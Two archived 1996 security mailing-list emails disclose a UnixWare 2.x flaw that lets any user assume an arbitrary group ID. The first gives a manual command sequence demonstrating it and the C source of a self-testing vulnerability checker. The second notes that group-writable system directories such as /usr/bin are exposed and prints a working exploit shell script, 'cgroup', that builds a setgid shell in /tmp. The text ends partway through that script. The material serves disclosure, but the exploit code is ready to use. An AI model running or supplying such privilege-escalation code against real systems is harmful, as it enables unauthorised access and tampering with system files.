From best-of-security-request@suburbia.net Sun Sep 01 23:25:07 1996 Return-Path: Delivered-To: route@infonexus.com Received: (qmail-queue invoked from smtpd); 1 Sep 1996 23:25:04 -0000 Received: from mail5.netcom.com (root@192.100.81.141) by onyx.infonexus.com with SMTP; 1 Sep 1996 23:25:03 -0000 Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by mail5.netcom.com (8.6.13/Netcom) id HAA11561; Sun, 1 Sep 1996 07:30:03 -0700 Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id HAA06733; Sun, 1 Sep 1996 07:25:34 -0700 (PDT) Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id AAA19578; Mon, 2 Sep 1996 00:21:12 +1000 Resent-Date: Mon, 2 Sep 1996 00:21:12 +1000 Date: Mon, 2 Sep 1996 00:21:06 +1000 From: Julian Assange Message-Id: <199609011421.AAA19562@suburbia.net> To: best-of-security@suburbia.net Resent-Message-ID: <"y81952.0.qn4.MlPAo"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/310 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: More on the UnixWare problem Status: RO I'm afraid to do this, but all, here's the source to that binary I posted. Read it and gasp. :( The vendor's been notified but it'll be a while before I see action. I've contacted them; there's a trouble ticket open; I've also just learned that someone has leaked the details and it's flowing around the net already. CRINGE! You'll note that I took pains to hide the program's function, for good reason. I'd been through runaround at SCO for some time (I spent more than an hour on hold today alone ), but finally it was demonstrated to me by the following command sequence by a kind SCO engineer that on UnixWare 2.x (not just 2.0x, but 2.1 as well), the set-group-id privilege can be compromised by *any user*. % cp /usr/bin/ksh . % chmod 2700 ./ksh % chgrp 23456 ./ksh % ./ksh > id And 'id' reports effective group ID of 23456. Oh, s**t. Watch out, /dev/kmem. How about mode 775 directories? What, you say /usr/bin comes that way by default, group 'bin'? Someone get me a bottle of Advil. Oh, it's a high-security system? Make that a double--of codeine. ===== #include #include #include #include #include #include #define KEYMATCH "\x1D\xFC\x3A\x2FMZ" #define TESTGRP 17186 int main(int argc, char **argv) { struct stat st, *s = &st; pid_t p; if (argc == 2 && !strcmp(argv[1], KEYMATCH)) { if (getegid() == TESTGRP) { unsigned long r; srandom(time(NULL)); r = (unsigned long)random(); r = (r & 0xFFFF00FF) | ((r & 0xFF000000 >> 16) ^ (r & 0x00FF0000 >> 8) ^ (r & 0x000000FF << 8)); fprintf(stderr, "%s: system vulnerable code 0x%lX\n", argv[0], r); } else { fprintf(stderr, "%s: system not vulnerable\n", argv[0]); } return 0; } if (argc > 1) { fprintf(stderr, "%s: don't supply any arguments\n", argv[0]); return 0; } if (!strchr(argv[0], '/')) { fprintf(stderr, "%s: user error: run me with a pathname, not in $PATH\n", argv[0]); return 0; } if (stat(argv[0], s)) { fprintf(stderr, "%s: system error: cannot stat my binary?\n", argv[0]); return 0; } if (s->st_uid != geteuid() && s->st_uid != getuid()) { fprintf(stderr, "%s: user error: does this uid own my binary?\n", argv[0]); return 0; } chown(argv[0], -1, TESTGRP); if (chmod(argv[0], 02700)) { chown(argv[0], -1, s->st_gid); chmod(argv[0], s->st_mode); fprintf(stderr, "%s: user error: cannot chmod my own binary?\n", argv[0]); return 0; } if ((p = vfork()) == -1) { fprintf(stderr, "%s: system error: cannot fork\n", argv[0]); return 0; } if (!p) { execl(argv[0], argv[0], KEYMATCH, NULL); fprintf(stderr, "%s: system error: cannot exec\n", argv[0]); _exit(0); } chown(argv[0], -1, s->st_gid); chmod(argv[0], s->st_mode); return 0; } From best-of-security-request@suburbia.net Sun Sep 01 23:40:35 1996 Return-Path: Delivered-To: route@infonexus.com Received: (qmail-queue invoked from smtpd); 1 Sep 1996 23:40:33 -0000 Received: from mail6.netcom.com (root@192.100.81.142) by onyx.infonexus.com with SMTP; 1 Sep 1996 23:39:10 -0000 Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by mail6.netcom.com (8.6.13/Netcom) id HAA17462; Sun, 1 Sep 1996 07:32:05 -0700 Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id HAA06801; Sun, 1 Sep 1996 07:27:09 -0700 (PDT) Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id AAA19793; Mon, 2 Sep 1996 00:24:06 +1000 Resent-Date: Mon, 2 Sep 1996 00:24:06 +1000 Date: Mon, 2 Sep 1996 00:23:58 +1000 From: Julian Assange Message-Id: <199609011423.AAA19778@suburbia.net> To: best-of-security@suburbia.net Resent-Message-ID: <"KNua52.0.Br4.5oPAo"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/311 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: More on UnixWare 2.x vulnerability Status: RO I've found out a more about UnixWare 2. It seems the system (and I don't know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer) allows chown'ing a file *to* any arbitrary user and group. Hm, lessee. Create a file that uses up all the available space in /tmp, then chown it root:bin. Okay, now someone else tell me who created that file. Anyway, back to the setgid problem. I've found an exploit script (it's not all that difficult to do by hand, anyway...) on an FTP site pointed to by the floating post about this bug. It follows. While browsing the default installation of UnixWare, it seems a couple *hundred* directories, including particularly /usr/bin, /sbin, and /usr/sbin, are writable by group. This is bad, very bad. ===== #!/bin/sh # cgroup - pick a group id for unixware (run as cgroup ) cat >/tmp/.$$.c <<_end_ #include int main(void) { setgid(getegid()); execl("/bin/sh", "-", 0); } _end_ cc -o /tmp/.$$ /tmp/.$$.c rm -f /tmp/.$$.c chgrp $1 /tmp/.$$ chmod 6100 /tmp/.$$ /tmp/.$$ r